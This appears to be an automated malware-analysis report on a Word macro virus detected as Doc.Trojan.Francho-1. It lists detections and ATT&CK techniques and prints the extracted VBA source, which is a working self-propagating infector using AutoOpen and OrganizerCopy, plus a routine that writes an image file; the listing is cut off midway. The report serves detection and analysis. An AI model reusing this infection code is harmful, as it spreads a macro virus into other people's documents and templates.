Verdict: MALICIOUS
Risk Score: 220

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample is a Word document containing a VBA macro with an AutoOpen subroutine, indicative of malicious intent. The macro attempts to copy its own "NewMacros" module between the opened document and the global template (and from the global template back into other open documents) using Application.OrganizerCopy, which is a classic macro-virus infection mechanism. It also attempts to create a file named 'francho.jpg' in the template directory and embed it in the active document; the bytes it writes begin with a JPEG/JFIF header, so the file is an image payload, but the file may still be a decoy or part of a payload delivery chain.
Heuristics: 6

- ClamAV: Doc.Trojan.Francho-1 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Trojan.Francho-1
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts: 1

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 92072 bytes | 07f8ba60724b73f6e72267389f2d28c970bdd414c7beab9156316903bde9fa9e |
Preview script: first 1,000 lines of the extracted script (the listing below is truncated)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
' Infector Engine
' (c) 1999 by ?
On Error GoTo error
anfitrion = Application.MacroContainer
portador = Application.Documents(1).path + "\" + Application.Documents(1)
globaldot = Application.Templates(1).path + "\" + Application.Templates(1)
If anfitrion = Application.Templates(1) Then GoTo SeEjecutoElGlobal
Application.OrganizerDelete Source:=globaldot, Name:="NewMacros", Object:=wdOrganizerObjectProjectItems
error:
If portador = "" Then GoTo fin
Application.OrganizerCopy Source:=portador, Destination:=globaldot, Name:="NewMacros", Object:=wdOrganizerObjectProjectItems
GoTo fin
SeEjecutoElGlobal:
On Error GoTo fin
For T = 1 To 10
anfitrion = Application.Documents(T).path + "\" + Application.Documents(T)
Application.OrganizerCopy Source:=globaldot, Destination:=anfitrion, Name:="NewMacros", Object:=wdOrganizerObjectProjectItems
Next T
fin:
cs = Second(Now())
If (cs > 50) Then
globaldotf = Application.Templates(1).path + "\francho.jpg"
GenBin0 (globaldotf)
ActiveDocument.Shapes.AddPicture Anchor:=Selection.Range, FileName:= _
globaldotf, LinkToFile:=False, _
SaveWithDocument:=True
Selection.TypeText Text:="Hasta donde crees que puedes llegar hoy ?"
End If
End Sub
Sub GenBin0(spath As String)
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile(spath, True)
Line = Chr$(255) + Chr$(216) + Chr$(255) + Chr$(224) + Chr$(0) + Chr$(16) + Chr$(74) + Chr$(70) + Chr$(73) + Chr$(70) + Chr$(0) + Chr$(1) + Chr$(1) + Chr$(0) + Chr$(0) + Chr$(1) + Chr$(0) + Chr$(1) + Chr$(0) + Chr$(0) + Chr$(255) + Chr$(219) + Chr$(0) + Chr$(67) + Chr$(0) + Chr$(28) + Chr$(19) + Chr$(21) + Chr$(24) + Chr$(21)
a.Write (Line)
Line = Chr$(17) + Chr$(28) + Chr$(24) + Chr$(22) + Chr$(24) + Chr$(31) + Chr$(29) + Chr$(28) + Chr$(33) + Chr$(41) + Chr$(69) + Chr$(45) + Chr$(41) + Chr$(38) + Chr$(38) + Chr$(41) + Chr$(84) + Chr$(60) + Chr$(64) + Chr$(50) + Chr$(69) + Chr$(100) + Chr$(88) + Chr$(105) + Chr$(103) + Chr$(98) + Chr$(88) + Chr$(96) + Chr$(95) + Chr$(110)
a.Write (Line)
Line = Chr$(124) + Chr$(158) + Chr$(134) + Chr$(110) + Chr$(117) + Chr$(150) + Chr$(119) + Chr$(95) + Chr$(96) + Chr$(138) + Chr$(187) + Chr$(139) + Chr$(150) + Chr$(163) + Chr$(169) + Chr$(177) + Chr$(179) + Chr$(177) + Chr$(107) + Chr$(132) + Chr$(194) + Chr$(208) + Chr$(193) + Chr$(172) + Chr$(206) + Chr$(158) + Chr$(174) + Chr$(177) + Chr$(170) + Chr$(255)
a.Write (Line)
Line = Chr$(219) + Chr$(0) + Chr$(67) + Chr$(1) + Chr$(29) + Chr$(31) + Chr$(31) + Chr$(41) + Chr$(36) + Chr$(41) + Chr$(81) + Chr$(45) + Chr$(45) + Chr$(81) + Chr$(170) + Chr$(114) + Chr$(96) + Chr$(114) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170)
a.Write (Line)
Line = Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170)
a.Write (Line)
Line = Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(255) + Chr$(192) + Chr$(0) + Chr$(17) + Chr$(8) + Chr$(0) + Chr$(81) + Chr$(0) + Chr$(68) + Chr$(3) + Chr$(1) + Chr$(34) + Chr$(0) + Chr$(2) + Chr$(17) + Chr$(1) + Chr$(3) + Chr$(17) + Chr$(1) + Chr$(255) + Chr$(196) + Chr$(0)
a.Write (Line)
Line = Chr$(31) + Chr$(0) + Chr$(0) + Chr$(1) + Chr$(5) + Chr$(1) + Chr$(1) + Chr$(1) + Chr$(1) + Chr$(1) + Chr$(1) + Chr$(0) + Chr$(0) + Chr$(0) + Chr$(0) + Chr$(0) + Chr$(0) + Chr$(0) + Chr$(0) + Chr$(1) + Chr
... (truncated)